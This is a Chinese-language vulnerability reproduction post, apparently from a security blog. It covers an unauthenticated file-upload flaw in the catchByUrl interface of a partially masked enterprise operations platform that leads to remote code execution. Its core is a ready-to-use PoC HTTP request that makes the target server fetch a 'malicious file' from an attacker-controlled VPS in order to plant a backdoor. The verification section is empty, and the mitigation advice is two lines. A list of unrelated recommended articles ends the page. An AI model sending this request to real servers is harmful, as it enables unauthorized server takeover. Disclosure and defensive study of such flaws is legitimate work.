某科聚网一体化运营平台 catchByUrl 文件上传致RCE漏洞复现

0x01 产品简介

某科聚网一体化运营平台是一种综合性的软件平台,旨在帮助企业实现运营管理的集中化、自动化和协同化。该平台通常提供一系列功能模块和工具,用于支持企业在销售、营销、客户关系管理、供应链管理、人力资源管理等方面的运营活动。

0x02 漏洞概述

某科聚网一体化运营平台 catchByUrl接口存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,执行任意指令,从而获取服务器权限。

0x03 复现环境

0x04 漏洞复现

PoC

复制代码
GET /resources/files/ue/catchByUrl?url=http://vpsip/恶意文件 HTTP/1.1 
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close

验证

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
jonyleek1 小时前
如何搭建一套安全的,企业级本地AI专属知识库系统?从安装系统到构建知识体系,全流程!
人工智能·安全
还是奇怪2 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
fishwheel5 小时前
Android:Reverse 实战 part 2 番外 IDA python
android·python·安全
pingao1413788 小时前
雨雪雾冰全预警:交通气象站为出行安全筑起“隐形防护网”
安全
kura_tsuki8 小时前
[Linux入门] Linux 远程访问及控制全解析:从入门到实战
linux·服务器·安全
Hello.Reader11 小时前
Elasticsearch安全审计日志设置与最佳实践
安全·elasticsearch·jenkins
Lyndon110712 小时前
K8S 九 安全认证 TLS
安全·容器·kubernetes
hqxstudying16 小时前
Java异常处理
java·开发语言·安全·异常
终焉暴龙王1 天前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川1 天前
Apache文件解析漏洞
web安全·apache